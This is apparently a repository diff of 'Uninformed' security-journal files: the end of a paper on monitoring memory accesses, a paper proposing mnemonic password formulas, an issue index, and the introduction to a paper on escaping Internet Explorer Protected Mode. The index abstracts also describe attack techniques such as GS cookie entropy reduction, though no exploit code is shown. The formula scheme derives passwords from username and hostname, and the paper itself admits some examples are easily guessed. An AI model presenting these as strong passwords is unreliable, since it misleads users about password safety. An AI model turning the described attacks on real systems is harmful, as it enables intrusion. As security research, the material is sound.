is also much simpler than the other approaches in that it requires far less
code. While these are all good things, there are some negative considerations
that should also be pointed out. These are enumerated below:
1. Will not work on x64
The segmentation approach described in this section will not work on x64
due to the fact that the DS, ES, and even SS segment selectors are
effectively ignored when the processor is in 64-bit mode.
2. Significant performance overhead
Like many of the other approaches, this one also suffers from significant
performance overhead involved in having to take a GP and DB fault for
every address reference. This approach could be be further optimized by
creating a custom LDT entry (using NtSetLdtEntries) that describes a
region whose base address is 0 and length is n where n is just below the
address of the region(s) that should be monitored. This would have the
effect of allowing memory accesses to succeed within the lower portion of
the address space and fail in the higher portion (which is being
monitored). It's important to note that the base address of the LDT entry
must be zero. This is problematic since most of the regions that one
would like to monitor (heap) are allocated low in the address space. It
would be possible to work around this issue by having
NtAllocateVirtualMemory allocate using MEM\_TOP\_DOWN.
3. Requires a disassembler
Unfortunately, this approach also requires the use of a disassembler in
order to extract the effective address that caused the access violation
exception to occur. This is necessary because general protection faults
that occur due to a segment selector issue generate exception records that
flag the fault address as being 0xffffffff. This makes sense in the
context that without a valid segment selector, there is no way to
accurately calculate the effective address. The use of a disassembler
means that the code is inherently more complicated than it would otherwise
need to be. There may be some way to craft a special LDT entry that would
still make it possible to determine the address that cause the fault, but
the author has not investigated this.
3) Potential Uses
The ability to intercept an application's memory accesses is an interesting
concept but without much use beyond simple statistical and visual analysis.
Even though this is the case, the data that can be collected by analyzing
memory access behavior can make it possible to perform much more extensive
forms of dynamic binary analysis. This section will give a brief introduction
to some of the hypothetical areas that might benefit from being able to
understand the memory access behavior of an application.
3.1) Data Propagation
Being able to gain knowledge about the way that data propagates throughout an
application can provide extremely useful insights. For example, understanding
data propagation can give security researchers an idea of the areas of code
that are affected, either directly or indirectly, by a buffer that is received
from a network socket. In this context, having knowledge about areas affected
by data would be much more valuable than simply understanding the code paths
that are taken as a result of the buffer being received. Though the two may
seem closely related, the areas of code affected by a buffer that is received
should actually be restricted to a subset of the overall code paths taken.
Even if understanding data propagation within an application is beneficial, it
may not be clear exactly how analyzing memory access behavior could make this
possible. To understand how this might work, it's best to think of memory
access in terms of its two basic operations: read and write. In the course of
normal execution, any instruction that reads from a location in memory can be
said to be dependent on the last instruction that wrote to that location.
When an instruction writes to a location in memory, it can be said that any
instructions that originally wrote to that location no longer have claim over
it. Using these simple concepts, it is possible to build a dependency graph
that shows how areas of code become dependent on one another in terms of a
reader/writer relationship. This dependency graph would be dynamic and would
change as a program executes just the same as the data propagation within an
application would change.
At this point in time, the author has developed a very simple implementation
based on the DBI strategy outlined in this paper. The current implementation
is in need of further refinement, but it is capable of showing reader/writer
relationships as the program executes. This area is ripe for future research.
3.2) Memory Access Isolation
From a visualization standpoint, it might be interesting to be able to show
with what degrees of code-level isolation different regions of memory are
accessed. For example, being able to show what areas of code touch individual
heap allocations could provide interesting insight into the containment model
of an application that is being analyzed. This type of analysis might be able
to show how well designed the application is by inferring code quality based
on the average number of areas of code that make direct reference to unique
heap allocations. Since this concept is a bit abstract, it might make sense
to discuss a more concrete example.
One example might involve an object-oriented C++ application that contains
multiple classes such as Circle, Shape, Triangle, and so on. In the first
design, the application allows classes to directly access the attributes of
instances. In the second design, the application forces classes to reference
attributes through public getters and setters. Using memory access behavior
to identify code-level isolation, the first design might be seen as a poor
design due to the fact that there will be many code locations where unique
heap allocations (class instances) have the contents of their memory accessed
directly. The second design, on the other hand, might be seen as a more
robust design due to the fact that the unique heap allocations would be
accessed by fewer places (the getters and setters).
It may actually be the case that there's no way to draw a meaningful
conclusion by analyzing code-level isolation of memory accesses. One specific
case that was raised to the author involved how the use of inlining or
aggressive compiler optimizations might incorrectly indicate a poor design.
Even though this is likely true, there may be some knowledge that can be
obtained by researching this further. The author is not presently aware of an
implementation of this concept but would love to be made aware if one exists.
3.3) Thread Data Consistency
Programmers familiar with the pains of thread deadlocks and thread-related
memory corruption should be well aware of how tedious these problems can be to
debug. By analyzing memory access behavior in conjunction with some
additional variables, it may be possible to make determinations as to whether
or not a memory operation is being made in a thread safe manner. At this
point, the author has not defined a formal approach that could be taken to
achieve this, but a few rough ideas have been identified.
The basic idea behind this approach would be to combine memory access behavior
with information about the thread that the access occurred in and the set of
locks that were acquired when the memory access occurred. Determining which
locks are held can be as simple as inserting instrumentation code into the
routines that are used to acquire and release locks at runtime. When a lock
is acquired, it can be pushed onto a thread-specific stack. When the lock is
released, it can be removed. The nice thing about representing locks as a
stack is that in almost every situation, locks should be acquired and released
in symmetric order. Acquiring and releasing locks asymmetrically can quickly
lead to deadlocks and therefore can be flagged as problematic.
Determining data consistency is quite a bit trickier, however. An analysis
library would need some means of historically tracking read and write access
to different locations in memory. Still, determining what might be a data
consistency issue from this historical data is challenging. One example of a
potential data consistency issue might be if two writes occur to a location in
memory from separate threads without a common lock being acquired between the
two threads. This isn't guaranteed to be problematic, but it is at the very
least be indicative of a potential problem. Indeed, it's likely that many
other types of data consistency examples exist that may be possible to capture
in relation to memory access, thread context, and lock ownership.
Even if this concept can be made to work, the very fact that it would be a
runtime solution isn't a great thing. It may be the case that code paths that
lead to thread deadlocks or thread-related corruption are only executed rarely
and are hard to coax out. Regardless, the author feels like this represents
an interesting area of future research.
4) Previous Work
The ideas described in this paper benefit greatly from the concepts
demonstrated in previous works. The memory mirroring concept described in 2.2
draws heavily from the PaX team's work relating to their VMA mirroring and
software-based non-executable page implementations[8]. Oded Horovitz provided an
implementation of the paging approach for Windows and applied it to
application security[4]. In addition, there have been other examples that use
concepts similar to those described by PaX to achieve additional results, such
as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for
memory analysis is facilitated by the excellent work that has gone into
DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11].
It should be noted that if one is strictly interested in monitoring writes to
a memory region, Windows provides a built-in feature known as a write watch.
When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set.
This flag tells the kernel to track writes that occur to the region. These
writes can be queried at a later point in time using GetWriteWatch[6].
It is also possible to use guard pages and other forms of page protection,
such as PAGE_NOACCESS, to intercept memory access to a page in user-mode.
Pedram Amini's PyDbg supports the concept of memory breakpoints which are
implemented using guard pages[12]. This type of approach has two limitations
that are worth noting. The first limitation involves an inability to pass
addresses to kernel-mode that have had a memory breakpoint set on them (either
guard page or PAGE_NOACCESS). If this occurs it can lead to unexpected
behavior, such as by causing a system call to fail when referencing the
user-mode address. This would not trigger an exception in user-mode.
Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a
result, an application might crash or otherwise behave improperly. The second
limitation is that there may be consequences in multi-threaded environments
where memory accesses are missed.
5) Conclusion
The ability to analyze the memory access behavior of an application at runtime
can provide additional insight into how an application works. This insight
might include learning more about how data propagates, deducing the code-level
isolation of memory references, identifying potential thread safety issues,
and so on. This paper has described three strategies that can be used to
intercept memory accesses within an application at runtime.
The first approach relies on Dynamic Binary Instruction (DBI) to inject
instrumentation code before instructions that access memory locations. This
instrumentation code is then capable of obtaining information about the
address being referenced when instructions are executed.
The second approach relies on hardware paging features supported by the x86
and x64 architecture to intercept memory accesses. This works by restricting
access to a virtual address range to kernel-mode access. When an application
attempts to reference a virtual address that has been marked as such, an
exception is generated that is then passed to the user-mode exception
dispatcher. A custom exception handler can then inspect the exception and
take the steps necessary to allow execution to continue gracefully after
having tracked the memory access.
The third approach uses the segmentation feature of the x86 architecture to
intercept memory accesses. It does this by loading the DS and ES segment
registers with the null selector. This has the effect of causing instructions
which implicitly use these registers to generate a general protection fault
when referencing memory. This fault results in an access violation exception
being generated that can be handled in much the same way as the hardware
paging approach.
It is hoped that these strategies might be useful to future research which
could benefit from collecting memory access information.
References
[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming.
http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007.
[2] Bala, Duesterwald, Banerija. Transparent Dynamic Optimization.
http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007.
[3] Hewlett-Packard, MIT. DynamoRIO.
http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007.
[4] Horovitz, Oded. Memory Access Detection.
http://cansecwest.com/core03/mad.zip; accessed 5/7/2007.
[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming.
http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007.
[6] Microsoft Corporation. GetWriteWatch.
http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007.
[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation.
http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007.
[8] PaX Team. PAGEEXEC.
http://pax.grsecurity.net/docs/pageexec.txt; accessed 5/1/2007.
[9] Sparks, Butler. Shadow Walker: Raising the Bar for Rootkit Detection.
https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; accessed 5/3/2007.
[10] Stewart, Joe. Ollybone.
http://www.joestewart.org/ollybone/; accessed 5/3/2007.
[11] Valgrind. Valgrind.
http://valgrind.org/; accessed 4/30/2007.
[12] Amini, Pedram. PaiMei.
http://pedram.redhive.com/PaiMei/docs/; accessed 5/10/2007.

491
uninformed/7.3.txt Normal file
View File

@ -0,0 +1,491 @@
Mnemonic Password Formulas
I)ruid, C²ISSP
druid@caughq.org
http://druid.caughq.org
5/2007
Abstract
The current information technology landscape is cluttered with a large
number of information systems that each have their own individual
authentication schemes. Even with single sign-on and multi-system
authentication methods, systems within disparate management domains
are likely to be utilized by users of various levels of involvement
within the landscape as a whole. Due to this complexity and the
abundance of authentication requirements, many users are required to
manage numerous credentials across various systems. This has given rise to
many different insecurities relating to the selection and management of
passwords. This paper details a subset of issues facing users and managers of
authentication systems involving passwords, discusses current approaches to
mitigating those issues, and finally introduces a new method for password
management and recalls termed Mnemonic Password Formulas.
1) The Problem
1.1) Many Authentication Systems
The current information systems landscape is cluttered with individual
authentication systems. Even though many systems existing in a distinct
management domain utilize single sign-on as well as multi-system
authentication mechanisms, multiple systems within disparate management
domains are likely to be utilized regularly by users. Even users at the most
casual level of involvement in information systems can be expected to
interface with a half a dozen or more individual authentication systems within
a single day. On-line banking systems, corporate intranet web and database
systems, e-mail systems, and social networking web sites are a few of the many
systems that may require their own method of user authentication.
Due to the abundance of authentication systems, many end users are required to
manage the large numbers of passwords needed to authenticate with these
various systems. This issue has given rise to many common insecurities related
to selection and management of passwords.
In addition to the prevalence of insecurities in password selection and
management, advances in authentication and cryptography assemblages have
instigated a shift in attack methodologies against authentication systems.
While recent headway in computing power have made shorter passwords such as
six characters or less (regardless of the complexity of their content)
vulnerable to cracking by brute force[4], common attack methodologies are moving
away from cryptanalytic and brute force methods against the password storage
or authentication system in favor of intelligent guessing of passwords such
as. This intelligent guessing might involved optimized dictionary attacks and
user context guesses, attacks against other credentials required by the
authentication system such as key-cards and password token devices, and
attacks against the interaction between the user and the systems themselves.
Due to all of the aforementioned factors, the user's password is commonly the
weakest link in any given authentication system.
1.2) Managing Multiple Passwords
Two of the largest problems with password authentication relate directly to
the user and how the user manages passwords. First, when users are not allowed
to write down their passwords, they generally will choose easy to remember
passwords which are usually much easier to crack than complex passwords. In
addition to choosing weaker passwords, users are more likely to re-use
passwords across multiple authentication systems.
Users have an inevitably difficult time memorizing assigned random
passwords[4] and passwords of a mandated higher level of complexity chosen
themselves. When allowed, they may write down their passwords in an insecure
location such as a post-it note stuck to their computer monitor or on a note
pad in their desk. Alternatively, they may store passwords securely, such as
a password encrypted file within a PDA. However, a user could just as easily
lose access to the password store. The user may forget the password to the
encrypted file, or the PDA could be lost or stolen. In this situation, the end
result would require some administrative interaction in the form of issuing a
password reset.
1.3) Poor Password Selection
When left to their own devices, users generally do not choose complex
passwords[4] and tend to choose easy to crack dictionary words because they
are easy to remember. Occasionally an attempt will be made at complexity by
concatenating two words together or adding a number. In many cases, the word
or words chosen will also be related to, or within the context of, the user
themselves. This context might include things like a pet's name, phone
number, or a birth date.
These types of passwords require much less effort to crack than a brute-force
trial of the entire range of potential passwords. By using an optimized
dictionary attack method, common words and phrases are tried first which
usually leads to success. Due to the high success rate of this method, most
modern attacks on authentication systems target guessing the password first
before attempting to brute-force the password or launch an in-depth attack on
the authentication system itself.
1.4) Failing Stupid
When a user cannot remember their password, likely because they have too many
passwords to remember or the password was forced to be too complex for them to
remember, many authentication systems provide a mechanism that the author has
termed ``failing stupid.''
When the user ``fails stupid,'' they are asked a reminder question which is
usually extremely easy for them to answer. If answered correctly, users are
presented with an option to either reset their password, have it e-mailed to
them, or perform some other password recovery method. When this type of
recovery method is available, it effectively reduces the security of the
authentication system from the strength of the password to the strength of a
simple question. The answer to this question might even be obtainable through
public information.
1.4.1) Case Study: Paris Hilton Screwed by Dog
A well publicized user context attack[2] was recently executed against the
Hollywood celebrity Paris Hilton in which her cellular phone was compromised.
The account password recovery question that she selected for use with her
cellular provider's web site was "What is your favorite pet's name?" Many fans
can most likely recollect from memory the answer to this question, not to
mention fan web sites, message boards, and tabloids that likely have this
information available to anyone that wishes to gather it. The attacker simply
"failed stupid" and reset Hilton's online account password which then allowed
access to her cellular device and its data.
2) Existing Approaches
2.1) Write Down Passwords
During the AusCERT 2005 information security conference, Jesper Johansson,
Senior Program Manager for Security Policy at Microsoft, suggested[1] reversing
decades of information security best practice of not writing down passwords.
He claimed that the method of password security wherein users are prohibited
from writing down passwords is absolutely wrong. Instead, he advocated
allowing users to write down their passwords. The reasoning behind his claim
is an attempt at solving one of the problems mentioned previously: when users
are not allowed to write down their passwords they tend to choose easy to
remember (and therefore easy to crack) passwords. Johansson believes that
allowing users to write down their passwords will result in more complex
passwords being used.
While Mr. Johansson correctly identifies some of the problems of password
security, his approach to solving these conundrums is not only short-sighted,
but also noncomprehensive. His solution solves users having to remember
multiple complex passwords, but lso creates the aforementioned insecure
scenarios regarding written passwords which are inherently physically less
secure and prone to require administrative reset due to loss.
2.2) Mnemonic Passwords
A mnemonic password is a password that is easily recalled by utilizing a
memory trick such as constructing passwords from the first letters of easily
remembered phrases, poems, or song lyrics. An example includes using the
first letters of each word in a phrase, such as: "Jack and Jill went up the
hill," which results in the password "JaJwuth". For mnemonic passwords to be
useful, the phrase must be easy for the user to remember.
Previous research has shown[4] that passwords built from phrase recollection like
the example above yield passwords with complexity akin to true random
character distribution. Mnemonic passwords share a weakness with regular
passwords in that users may reuse them across multiple authentication systems.
Such passwords are also commonly created using well known selections of text
from famous literature or music lyrics. Password cracking dictionaries have
been developed that contain many of these common mnemonics.
2.3) More Secure Mnemonic Passwords
More Secure Mnemonic Passwords[1] (MSMPs), are passwords that are derived from
simple passwords which the user will remember with ease, however, they use
mnemonic substitutions to give the password a more complex quality.
``Leet-speaking'' a password is a simple example of this technique. For
example, converting the passwords ``beerbash'' and ``catwoman'' into
leet-speak would result in the passwords ``b33rb4sh'' and ``c@w0m4n'',
respectively.
A unique problem of MSMPs is that not all passwords can be easily transformed
which limits either the choice of available passwords or the password's
seemingly complex quality. MSMPs also rely on permutations of an underlying
dictionary words or sets of words which are easy to remember. Various cracking
dictionaries have been developed to attack specific methods of permutations
such as the "leet-speak" method mentioned above. As with mnemonic passwords,
these passwords might be reused across multiple authentication systems.
2.4) Pass Phrases
Pass phrases[3] are essentially what is used as the root of a mnemonic password.
They are easier to remember and much longer which results in a password being
much more resilient to attack by brute force. Pass phrases tend to be much
more complex due to the use of upper and lower case characters, white-space
characters, as well as special characters like punctuation and numbers.
However, pass phrases have their own sets of problems. Many authentication
systems do not support lengthy authentication tokens, thus resulting in pass
phrases that are not consistently usable. Like the aforementioned methods,
the same pass phrase may be reused across multiple authentication systems.
3) Mnemonic Password Formulas
3.1) Definition
A Mnemonic Password Formula, or MPF, is a memory technique utilizing a
predefined, memorized formula to construct a password on the fly from various
context information that the user has available.
3.2) Properties
Given a well designed MPF, the resultant password should have the following
properties:
- A seemingly random string of characters
- Long and very complex, therefore difficult to crack via brute force
- Easy to reconstruct by a user with knowledge of only the formula,
themselves, and the target authentication system
- Unique for each user, class of access, and authenticating system
3.3) Formula Design
3.3.1) Syntax
For the purposes of this paper, the following formula syntax will be used:
- <X> : An element, where <X> is meant to be entirely replaced by something known as described by X.
- | : When used within an element's angle brackets (< and >), represents an OR value choice.
- All other characters are literal.
3.3.2) A Simple MPF
The following simple formula should be sufficient to demonstrate the MPF
concept. Given the authenticating user and the corresponding authenticating
system, a formula like that shown in the following example could be
constructed. This example formula contains two elements: the user and
the target system identified either by hostname or the most significant octet
of the IP address.
<user>!<hostname|lastoctet>
The above MPF would yield such passwords as:
- "druid!neo" for user druid at system neo.jpl.nasa.gov
- "intropy!intropy" for user intropy at system intropy.net
- "thegnome!nmrc" for user thegnome at system nmrc.org
- "druid!33" for user druid at system 10.0.0.33
This simple MPF schema creates fairly long, easy to remember, passwords that
contain a special character. However, it does not yield very complex
passwords. A diligent attacker may include the target user and hostname as
some of the first combinations of dictionary words used in a brute force
attack against the password. Due to the fact that only the hostname or last
octet of the IP address is used as a component of the schema, passwords may
not be unique per system. If the same user has an account on two different web
servers, both with hostname "www", or two different servers with the same last
address octet value within two different sub-nets, the resultant passwords
will be identical. Finally, the passwords yielded are variable in length and
may not comply with a given systems password length policies.
3.3.3) A More Complex MPF
By modifying the simple MPF above, complexity can be improved. Given the
authenticating user and the authenticating system, an MPF with the following
components can be constructed:
<u>!<h|n>.<d,d,...|n,n,...>
The more complex MPF contains three elements: <u> represents the first letter
of the username, <h|n> represents the first letter of the hostname or first
number of the first address octet, and <d,d,...|n,n,...> represents the first
letters of the remaining domain name parts or first numbers of the remaining
address octets, concatenated together. This MPF also contains another special
character in addition to the exclamation mark, the period between the second
and third element.
The above MPF would yield such passwords as:
- "d!n.jng" for user druid at system neo.jpl.nasa.gov
- "i!i.n" for user intropy at system intropy.net
- "t!n.o" for user thegnome at system nmrc.org
- "d!1.003" for user druid at system 10.0.0.33
The modified MPF contains two special characters which yields more complex
passwords, however, the passwords are still variable length and may not comply
with the authenticating system's password length policies. The example MPF is
also increasing in complexity and may not be easily remembered.
3.3.4) Design Goals
The ideal MPF should meet as many of the following design goals as possible:
- Contain enough elements and literals to always yield a minimum password
length
- Contain enough complex elements and literals such as capital letters and
special characters to yield a complex password
- Elements must be unique enough to yield a unique password per
authenticating system
- Must be easily remembered by the user
3.3.5) Layered Mnemonics
Due to the fact that MPFs can become fairly complex while attempting to meet
the first three design goals listed above, a second layer of mnemonic
properties can be applied to the MPF. The MPF, by definition, is a mnemonic
technique due to its property of allowing the user to reconstruct the password
for any given system by remembering only the MPF and having contextual
knowledge of themselves and the system. Other mnemonic techniques can be
applied to help remember the MPF itself. This second layer of mnemonics may
also be tailored to the user of the MPF.
Given the authenticating user and the authenticating system, an adequately
complex, long, and easy to remember MPF like the following could be
constructed:
<u>@<h|n>.<d|n>;
This MPF contains three elements: <u> represents the first letter of the
username, <h|n> represents the first letter of the hostname or first number of
the first address octet, and <d|n> represents the last letter of the domain
name suffix or last number of the last address octet. The modified MPF also
contains a third special character in addition to the exclamation mark and
period: the semicolon after the final element.
The above MPF would yield such passwords as:
- "d@n.v;" for user druid at system neo.jpl.nasa.gov
- "i@i.t;" for user intropy at system intropy.net
- "t@n.g;" for user thegnome at system nmrc.org
- "d@1.3;" for user druid at 10.0.0.33
Unlike the previously discussed MPFs, the one mentioned above employs a
secondary mnemonic technique by reading in a natural way and is thus easier
for a user to remember. The MPF can be read and remembered as ``user at host
dot domain,'' which is equatable to the structural format of an email address.
Also, a secondary mnemonic technique specific to the user of this MPF was used
by appending the literal semicolon character. This MPF was designed by a C
programmer who would naturally remember to terminate her passwords with
semicolons.
3.3.6) Advanced Elements
MPFs can be made even more complex through use of various advanced elements.
Unlike simple elements which are meant to be replaced entirely by some static
value like a username, first letter of a username, or some part of the
hostname, advanced elements such as repeating elements, variable elements, and
rotating or incrementing elements can be used to vastly improve the MPF's
output complexity. Note, however, that overuse of these types of elements may
cause the MPF to not meet design goal number four by making the MPF too
difficult for the user to remember.
- Repeating Elements
MPFs may yield longer passwords by repeating simple elements. For
example, an element such as the first letter of the hostname may be
used twice:
<u>@<h|n><h|n>.<d>;
Such repeating elements are not required to be sequential, and
therefore may be inserted at any point within the MPF.
- Variable Elements
MPFs can yield more complex passwords by including variable elements. For
example, the MPF designer can prepend the characters "p:" or "b:" to the
beginning of the to include an element indicating whether the target system
is a personal or business.
<p|b>:<u>@<h|n>.<d|n>;
To further expand this example, consider a user who performs system
administration work for multiple entities. In this case the variable
element being prepended could be the first letter of the system's managing
entity:
<x>:<u>@<hi|n>.<d|n>;
<x> could be replaced by ``p'' for a personal system, ``E'' for a system
within Exxon-Mobil's management domain, or ``A'' for a system managed by
the Austin Hackers Association. Most of the elements used thus far are
relatively simple variable elements that derive their value from other
known contextual information such as user or system name. The contrast is
that elements are capricious only in how their value changes when the MPF
is applied to different systems. Variable elements change values in
relation to the context of the class of access or due to a number of other
factors outside the basic ``user/system'' context.
To illustrate this concept, the use of the same MPF for a super-user and an
unprivileged user account on the same system may result in passwords that
only differ slightly. Including a variable element can help to mitigate
this similarity. Prepending the characters ``0:'' or ``1:'' to the
resultant password to indicate super-user versus unprivileged user access.
Respectively, by inclusion of an additional variable element in the MPF
will result in the password's increased complexity as well as indicating
class of access:
Variable elements are not required to prepend the beginning of the formula
as with the examples above; they can be easily appended or inserted
anywhere within the MPF.
- Rotating and Incrementing Elements
Rotating and incrementing elements can be included to assist in managing
password changes required to conform to password rotation policies. A
rotating element is one which rotates through a predefined list of values
such as "apple", "orange", "banana", etc. An incrementing element such as
the one represented below by is derived from an open-ended linear sequence
of values incremented through such as "1", "2", "3" or "one", "two",
"three". When a password rotation policy dictates that a password must be
changed, rotate or increment the appropriate elements:
<u>@<h|n>.<d|n>;<\#>
The above MPF results in passwords like "d@c.g:1", "d@c.g:2", "d@c.g:3",
etc. To further illustrate this principle, consider the following MPF:
<u>@<h|n>.<d|n>;<fruit>
The above MPF, when used with the predefined list of fruit values mentioned
above, yields passwords like "d@c.g:apple", "d@c.g:orange", "d@c.g:banana",
etc.
The only additional pieces of information that the user must remember other
than the MPF itself is the predefined list of values in the rotating
element, and the current value of the rotating or incrementing element.
In the case of rotating elements this list of values may potentially be
written down for easy reference without compromising the security of the
password itself. Lists may further be obscured by utilizing certain
values, like a grocery list or a list of company employees and telephone
extensions that may already be posted within the user's environment. In
the case of incrementing elements, knowledge of the current value should be
all that is required to determine the next value.
3.4) Enterprise Considerations
Large organizations could use MPFs assigned to specific users to facilitate
dual-access to a user's accounts across the enterprise. If the enterprise's
Security Operations group assigns unique MPFs to it's users, Security Officers
would then be able to access the user's accounts without intrusively modifying
the user's account or password. This type of management could be used for
account access when user is absent or indisposed, shared account access among
multiple staff members or within an operational group, or even surveillance of
a suspected user by the Security Operations group.
3.5) Weaknesses
3.5.1) The ``Skeleton Key'' Effect
The most significant weakness of passwords generated by MPFs is that when the
formula becomes compromised, all passwords to systems for which the user is
using the respective MPF schema are potentially compromised. This situation is
no worse than a user simply using the same password on all systems. In fact,
it is significantly better due to the resultant passwords being individually
unique. When using a password generated by an MPF, the password should be
unique per system and ideally appear to be a random string of characters. In
order to compromise the formula, an attacker would likely have to crack a
significant number of system's passwords which were generated by the formula
before being able to identify the correlation between them.
3.5.2) Complexity Through Password Policy
A second weakness of MPF generated passwords is that without rotating or
incrementing elements, they are not very resilient to password expiration or
rotation policies. There exists a trade-off between increased password
security via expiring passwords and MPF complexity. However, the trade-off is
either to have both, or neither. The more secure option is to use both,
however, this practice increases the complexity of the MPF potentially causing
the it to not meet design goal number four.
6) Conclusion
MPFs can effectively mitigate many of the existing risks of complex password
selection and management by users. However, their complexity and mnemonic
properties must be managed very carefully in order to achieve a comfortable
level of password security while also maintaining memorability. Users may
reintroduce many of the problems MPFs intend to solve when they become too
complex for users to easily remember.
References
[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans
http://www.cs.uno.edu/Resources/FAQ/faq4.html
[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords
http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html
[3] McWilliams, Brian. How Paris Got Hacked?
http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html
[4] Williams, Randall T. The Passphrase FAQ
http://www.iusmentis.com/security/passphrasefaq/
[5] Jeff Jianxin Yan and Alan F. Blackwell and Ross J. Anderson and Alasdair Grant. Password Memorability and Security: Empirical Results
http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81

19
uninformed/7.txt Normal file
View File

@ -0,0 +1,19 @@
Exploitation Technology
Reducing the Effective Entropy of GS Cookies
skape
This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.
pdf | code.tgz | html | txt
General Research
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
skape
This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.
pdf | code.tgz | html | txt
Mnemonic Password Formulas
I)ruid
The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas.
pdf | html | txt

1723
uninformed/8.1.txt Normal file

File diff suppressed because it is too large Load Diff

1111
uninformed/8.2.txt Normal file

File diff suppressed because it is too large Load Diff

362
uninformed/8.3.txt Normal file
View File

@ -0,0 +1,362 @@
Getting out of Jail: Escaping Internet Explorer Protected Mode
September, 2007
Skywing
Skywing@valhallalegends.com
http://www.nynaeve.net
Abstract: With the introduction of Windows Vista, Microsoft has added a new
form of mandatory access control to the core operating system. Internally
known as "integrity levels", this new addition to the security manager allows
security controls to be placed on a per-process basis. This is different from
the traditional model of per-user security controls used in all prior versions
of Windows NT. In this manner, integrity levels are essentially a bolt-on to
the existing Windows NT security architecture. While the idea is
theoretically sound, there does exist a great possibility for implementation
errors with respect to how integrity levels work in practice. Integrity
levels are the core of Internet Explorer Protected Mode, a new "low-rights"
mode where Internet Explorer runs without permission to modify most files or
registry keys. This places both Internet Explorer and integrity levels as a
whole at the forefront of the computer security battle with respect to Windows
Vista.
1) Introduction
Internet Explorer Protected Mode is a reduced-rights operational mode of
Internet Explorer where the security manager itself enforces a policy of not
allowing write access to most file system, registry, and other securable
objects by default. This mode does provide special sandbox file system and
registry space that is permitted to be written to by Internet Explorer when
operating in Protected Mode.
While there exist some fundamental shortcomings of Protected Mode as it is
currently implemented, such as an inability to protect user data from being
read by a compromised browser process, it has been thought to be effective at
blocking most write access to the system from a compromised browser. The
benefit of this is that if one is using Internet Explorer and a buffer overrun
occurs within IExplore.exe, the persistent impact should be lessened. For
example, instead of having write access to everything accessible to the user's
account, exploit code would instead be limited to being able to write to the
low integrity section of the registry and the low integrity temporary files
directories. This greatly impacts the ability of malware to persist itself or
compromise a computer beyond just IExplore.exe without some sort of user
interaction (such as persuading a user to launch a program from an untrusted
location with full rights, or other social engineering attacks).
2) Protected Mode and Integrity Levels
Internally, Protected Mode is implemented by running IExplore.exe as a low
integrity process. With the default security descriptor that is applied to
most securable objects, low integrity processes may not generally request
access rights that map to GENERIC_WRITE for a particular object. As Internet
Explorer does need to be able to persist some files and settings, exceptions
can (and are) carved out for low integrity processes in the form of registry
keys and directories with special security descriptors that grant the ability
for low integrity processes to request write access. Because the IExplore
process cannot write files to a location that would be automatically used
by a higher integrity process, and it cannot request dangerous access
rights to other running processes (such as the ability to inject code via
requesting PROCESS_VM_WRITE or the like), malware that runs in the context of
a compromised IExplore process is (theoretically) fairly contained from the
rest of the system.
However, this containment only holds as long as the system happens to be free
of implementation errors. Alas, but perhaps not unexpectedly, there are in
fact implementation problems in the way the system manages processes running
at differing integrity levels that can be leveraged to break out of the
Protected Mode (or low integrity) jail. To understand these implementation
errors, it is first necessary to gain a basic working understanding of how the
new integrity-based security model works in Windows. The integrity model is
key to a number of Windows Vista features, including UAC (User Account
Control).
When a user logs on to a computer in Windows Vista with UAC enabled, their
shell is normally started as a ``medium'' integrity process. Integrity levels
are integers and symbolic designations such as ``low'', ``medium'', ``high'',
or ``system'' are simply used to indicate certain well-known intermediate
values). Medium integrity is the default integrity level even for built-in
administrators (except the default ``Administrator'' account, which is a
special case and is exempted from UAC). Most day to day activity is intended
to be performed at medium integrity; for instance, a word processor program
would be expected to operate at medium integrity, and (theoretically) games
